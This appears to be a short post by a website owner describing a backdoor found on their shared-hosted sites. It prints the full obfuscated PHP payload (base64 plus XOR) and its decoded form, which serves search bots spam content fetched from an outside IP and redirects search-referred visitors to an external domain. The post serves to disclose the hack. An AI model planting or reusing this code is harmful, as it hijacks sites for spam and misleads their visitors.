We found this on a couple of sites with our (now dropped) iPowerWeb shared host. The code was typically dropped into a file located off the root directory like "/xyzzy/index.php".
<?eval(base64_decode("JGs9MTA3OyRtPWV4cGxvZGUoIjsiLCI3OTsxOTs5MDs4Njs3OTs
1Mjs1Njs0Njs1Nzs2MTs0Njs1Nzs0ODs3MzszNTs2Mzs2Mzs1OTs1MjszNTszNjs1Njs2Mzs3
Mzs1NDs4MDsxMDI7OTc7Nzk7MTk7ODg7ODY7Nzk7NTI7NTY7NDY7NTc7NjE7NDY7NTc7NDg7N
zM7NTY7NDA7NTc7MzQ7NTk7NjM7NTI7Mzc7NDI7Mzg7NDY7NzM7NTQ7ODA7MTAyOzk3OzEwMj
s5Nzs3OzI7MjQ7MzE7Njc7Nzk7Mjc7MTA7MzE7Mzs3MTs3OTsxNzs2Njs4NjsxNDsxOTsyNzs
3OzQ7MTU7MTQ7Njc7NzM7Mjs1OzE1OzE0OzE5OzY5OzI3OzM7Mjc7NzM7NzE7Nzk7MTk7ODg7
NjY7ODA7MTAyOzk3Ozc5OzY7ODY7NzM7Nzk7MTk7OTA7NzM7Njk7NzM7Nzk7Mjc7MTA7MzE7M
zs3Mzs4MDsxMDI7OTc7MTAyOzk3OzI7MTM7NzU7Njc7MjQ7MzE7MjU7MjsyNDszMTsyNTs2Nz
s3OTszNTs2Mzs2Mzs1OTs1Mjs2Mjs1Njs0Njs1Nzs1Mjs0Mjs0NDs0NjszNzs2Mzs3MTs3Mzs
xMjs0OzQ7MTI7NzsxNDs5OzQ7MzE7NzM7NjY7MjM7MjM7MjQ7MzE7MjU7MjsyNDszMTsyNTs2
Nzs3OTszNTs2Mzs2Mzs1OTs1Mjs2Mjs1Njs0Njs1Nzs1Mjs0Mjs0NDs0NjszNzs2Mzs3MTs3M
zsxODsxMDszOzQ7NDs3Mzs2NjsyMzsyMzs3OTs5OzQ7MzE7NjY7MTY7MTAyOzk3OzEwMjs5Nz
s5ODs0Ozk7NTI7MjQ7MzE7MTA7MjU7MzE7Njc7NzM7NDs5OzUyOzEyOzE3OzM7MTA7NTsxNTs
3OzE0OzI1OzczOzY2OzgwOzEwMjs5NzsxMDI7OTc7OTg7Nzk7MzA7MjU7Nzs4Njs3MzszOzMx
OzMxOzI3OzgxOzY4OzY4OzkyOzk1OzY5Ozk0Ozk0OzY5Ozg4OzkwOzY5OzkwOzg5OzkzOzY4O
zI3OzMxOzY4OzI7NTsxNTsxNDsxOTs2OTsyNzszOzI3Ozg0OzE1Ozg2Ozc5OzE5OzkwOzc3Oz
I3Ozg2Ozc5OzI3OzEwOzMxOzM7Nzc7NTsxMDs2OzE0Ozg2Ozc5OzU7MTA7NjsxNDs3Mzs4MDs
xMDI7OTc7OTg7Nzk7ODszOzc1Ozg2Ozc1Ozg7MzA7MjU7Nzs1MjsyOzU7MjszMTs2Nzs2Njs4
MDsxMDI7OTc7OTg7ODszMDsyNTs3OzUyOzI0OzE0OzMxOzQ7Mjc7MzE7NzU7Njc7Nzk7ODszO
zcxOzc1OzQwOzYyOzU3OzM5OzM2OzU5OzYzOzUyOzYyOzU3OzM5OzcxOzc1Ozc5OzMwOzI1Oz
c7NjY7ODA7MTAyOzk3Ozk4Ozg7MzA7MjU7Nzs1MjsyNDsxNDszMTs0OzI3OzMxOzc1OzY3Ozc
5Ozg7Mzs3MTs3NTs0MDs2Mjs1NzszOTszNjs1OTs2Mzs1Mjs1Nzs0Njs2Mzs2Mjs1NzszNzs2
Mzs1Nzs0MjszNzs1Njs0NTs0Njs1Nzs3MTs3NTs5MDs2Njs4MDsxMDI7OTc7OTg7ODszMDsyN
Ts3OzUyOzI0OzE0OzMxOzQ7Mjc7MzE7NzU7Njc7Nzk7ODszOzcxOzc1OzQwOzYyOzU3OzM5Oz
M2OzU5OzYzOzUyOzYzOzM0OzM4OzQ2OzM2OzYyOzYzOzcxOzc1OzkwOzk0OzY2OzgwOzEwMjs
5Nzs5ODs4OzMwOzI1Ozc7NTI7MjQ7MTQ7MzE7NDsyNzszMTs3NTs2Nzs3OTs4OzM7NzE7NzU7
NDA7NjI7NTc7Mzk7MzY7NTk7NjM7NTI7NDY7Mzc7NDA7MzY7NDc7MzQ7Mzc7NDQ7NzU7NzE7N
zU7NzM7MTI7MTc7MjsyNzs3Mzs2Njs4MDsxMDI7OTc7OTg7Nzk7MjU7MTQ7MjQ7MzA7NzszMT
s4Njs4OzMwOzI1Ozc7NTI7MTQ7MTk7MTQ7ODs3NTs2Nzs3OTs4OzM7NjY7ODA7MTAyOzk3Ozk
4Ozg7MzA7MjU7Nzs1Mjs4Ozc7NDsyNDsxNDs3NTs2Nzs3OTs4OzM7NjY7ODA7MTAyOzk3Ozk4
OzE0Ozg7Mzs0Ozc1Ozc5OzI1OzE0OzI0OzMwOzc7MzE7ODA7MTAyOzk3OzIyOzE0Ozc7MjQ7M
TQ7MTY7MTAyOzk3Ozk4Ozc5OzEyOzQ7NDsxNTs4Njs5MTs4MDsxMDI7OTc7OTg7MjsxMzs3NT
s2NzsyNDszMTsyNTsyOzI0OzMxOzI1OzY3Ozc5OzUyOzU2OzQ2OzU3OzYxOzQ2OzU3OzQ4Ozc
zOzM1OzYzOzYzOzU5OzUyOzU3OzQ2OzQ1OzQ2OzU3OzQ2OzU3OzczOzU0OzcxOzczOzEyOzQ7
NDsxMjs3OzE0OzczOzY2OzY2Ozc5OzEyOzQ7NDsxNTs4Njs5MDs4MDsxMDI7OTc7OTg7MjsxM
zs3NTs2NzsyNDszMTsyNTsyOzI0OzMxOzI1OzY3Ozc5OzUyOzU2OzQ2OzU3OzYxOzQ2OzU3Oz
Q4OzczOzM1OzYzOzYzOzU5OzUyOzU3OzQ2OzQ1OzQ2OzU3OzQ2OzU3OzczOzU0OzcxOzczOzE
4OzEwOzM7NDs0OzczOzY2OzY2Ozc5OzEyOzQ7NDsxNTs4Njs5MDs4MDsxMDI7OTc7OTg7Mjsx
Mzs3NTs2NzsyNDszMTsyNTsyOzI0OzMxOzI1OzY3Ozc5OzUyOzU2OzQ2OzU3OzYxOzQ2OzU3O
zQ4OzczOzM1OzYzOzYzOzU5OzUyOzU3OzQ2OzQ1OzQ2OzU3OzQ2OzU3OzczOzU0OzcxOzczOz
EwOzQ7Nzs3Mzs2Njs2Njs3OTsxMjs0OzQ7MTU7ODY7OTA7ODA7MTAyOzk3Ozk4OzI7MTM7NzU
7Njc7Nzk7MTI7NDs0OzE1OzY2OzE2OzEwMjs5Nzs5ODs5ODszOzE0OzEwOzE1OzE0OzI1OzY3
OzczOzM5OzQ7ODsxMDszMTsyOzQ7NTs4MTs3NTszOzMxOzMxOzI3OzgxOzY4OzY4OzM7NDs3O
zEwOzcwOzEwOzc7NDszOzEwOzY5OzU7MTQ7MzE7Njg7Mjs1OzY5OzI3OzM7Mjc7ODQ7MjQ7OD
Y7Nzk7MTk7OTA7Nzc7Mjk7MTQ7MjU7ODY7Nzk7Mjk7MTQ7MjU7MjQ7Mjs0OzU7NzM7NjY7ODA
7MTAyOzk3Ozk4OzIyOzE0Ozc7MjQ7MTQ7MTY7MTAyOzk3Ozk4Ozk4OzM7MTQ7MTA7MTU7MTQ7
MjU7Njc7NzM7Mzk7NDs4OzEwOzMxOzI7NDs1OzgxOzc1OzY4Ozk1OzkxOzk1OzczOzY2OzgwO
zEwMjs5Nzs5ODsyMjsxMDI7OTc7MjI7MTAyOzk3OyIpOyR6PSIiO2ZvcmVhY2goJG0gYXMgJH
YpaWYgKCR2IT0iIikkei49Y2hyKCR2XiRrKTtldmFsKCR6KTs="));?>
Changing "eval" to "echo" in order to see what is being executed:
$x1=$_SERVER["HTTP_HOST"]; $x3=$_SERVER["SCRIPT_NAME"]; list($path,$z)=explode("index.php",$x3); $m="$x1"."$path"; if (stristr($HTTP_USER_AGENT,"googlebot")||stristr($HTTP_USER_AGENT,"yahoo")||$bot){ ob_start("ob_gzhandler"); $url="http://74.55.31.126/pt/index.php?d=$x1&p=$path&name=$name"; $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 15); curl_setopt ($ch, CURLOPT_ENCODING , "gzip"); $result=curl_exec ($ch); curl_close ($ch); echo $result; }else{ $good=0; if (stristr($_SERVER["HTTP_REFERER"],"google"))$good=1; if (stristr($_SERVER["HTTP_REFERER"],"yahoo"))$good=1; if (stristr($_SERVER["HTTP_REFERER"],"aol"))$good=1; if ($good){ header("Location: http://hola-aloha.net/in.php?s=$x1&ver=$version"); }else{ header("Location: /404"); } }
The code allowed the hacker to arbitrarily create backlinks that appeared to be hosted on our site. Quite ingenious.